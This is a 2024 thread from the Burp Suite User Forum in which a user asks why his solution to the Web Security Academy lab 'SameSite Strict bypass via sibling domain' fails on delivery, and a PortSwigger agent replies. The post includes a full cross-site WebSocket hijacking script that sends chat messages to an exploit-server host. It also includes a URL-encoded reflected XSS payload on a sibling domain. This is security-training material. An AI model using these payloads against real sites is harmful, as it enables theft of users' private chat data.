Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab: SameSite Strict bypass via sibling domain - solution is broken

Jack | Last updated: Jul 12, 2024 11:01AM UTC

Hi this is my solution and and works fine when clicking "view exploit" (i see my messages at the access log) but when I deliver to victim there is no incoming request. can you pls fix the lab? I was going crazy about what can be the issue then I realized if it works at "view exploit" but not when delivered then the lab is broken. I tried also with fetch, with document.location.href etc, all worked for me but not when delivered GIF: https://postimg.cc/cgY3Mrv6 <script> let newWebSocket = new WebSocket("wss://0a1100c20450ae4880d662fe006900e9.web-security-academy.net/chat"); newWebSocket.onopen = function (evt) { newWebSocket.send("READY"); }; newWebSocket.onmessage = function (evt) { var message = evt.data; fetch('https://exploit-0a6700500409aed5803a618f017d00eb.exploit-server.net/exploit?message=' + btoa(message), { method: 'GET', mode: 'no-cors', }); }; </script> <script> document.location("https://cms-0a1100c20450ae4880d662fe006900e9.web-security-academy.net/login?username=%3c%73%63%72%69%70%74%3e%0a%20%20%20%20%6c%65%74%20%6e%65%77%57%65%62%53%6f%63%6b%65%74%20%3d%20%6e%65%77%20%57%65%62%53%6f%63%6b%65%74%28%22%77%73%73%3a%2f%2f%30%61%31%31%30%30%63%32%30%34%35%30%61%65%34%38%38%30%64%36%36%32%66%65%30%30%36%39%30%30%65%39%2e%77%65%62%2d%73%65%63%75%72%69%74%79%2d%61%63%61%64%65%6d%79%2e%6e%65%74%2f%63%68%61%74%22%29%3b%0a%0a%20%20%20%20%6e%65%77%57%65%62%53%6f%63%6b%65%74%2e%6f%6e%6f%70%65%6e%20%3d%20%66%75%6e%63%74%69%6f%6e%20%28%65%76%74%29%20%7b%0a%20%20%20%20%20%20%20%20%6e%65%77%57%65%62%53%6f%63%6b%65%74%2e%73%65%6e%64%28%22%52%45%41%44%59%22%29%3b%0a%20%20%20%20%7d%3b%0a%0a%20%20%20%20%6e%65%77%57%65%62%53%6f%63%6b%65%74%2e%6f%6e%6d%65%73%73%61%67%65%20%3d%20%66%75%6e%63%74%69%6f%6e%20%28%65%76%74%29%20%7b%0a%20%20%20%20%20%20%20%20%76%61%72%20%6d%65%73%73%61%67%65%20%3d%20%65%76%74%2e%64%61%74%61%3b%0a%0a%20%20%20%20%66%65%74%63%68%28%27%68%74%74%70%73%3a%2f%2f%65%78%70%6c%6f%69%74%2d%30%61%36%37%30%30%35%30%30%34%30%39%61%65%64%35%38%30%33%61%36%31%38%66%30%31%37%64%30%30%65%62%2e%65%78%70%6c%6f%69%74%2d%73%65%72%76%65%72%2e%6e%65%74%2f%65%78%70%6c%6f%69%74%3f%6d%65%73%73%61%67%65%3d%27%20%2b%20%62%74%6f%61%28%6d%65%73%73%61%67%65%29%2c%20%7b%0a%20%20%20%20%20%20%20%20%6d%65%74%68%6f%64%3a%20%27%47%45%54%27%2c%0a%20%20%20%20%6d%6f%64%65%3a%20%27%6e%6f%2d%63%6f%72%73%27%2c%0a%20%20%20%20%20%20%20%20%7d%29%3b%0a%20%20%20%20%7d%3b%0a%3c%2f%73%63%72%69%70%74%3e&password=ds"); </script>

Ben, PortSwigger Agent | Last updated: Jul 15, 2024 09:43AM UTC

Hi Jack, Are you seeing any interactions in the access log when you deliver your exploit?

Jack | Last updated: Jul 15, 2024 06:34PM UTC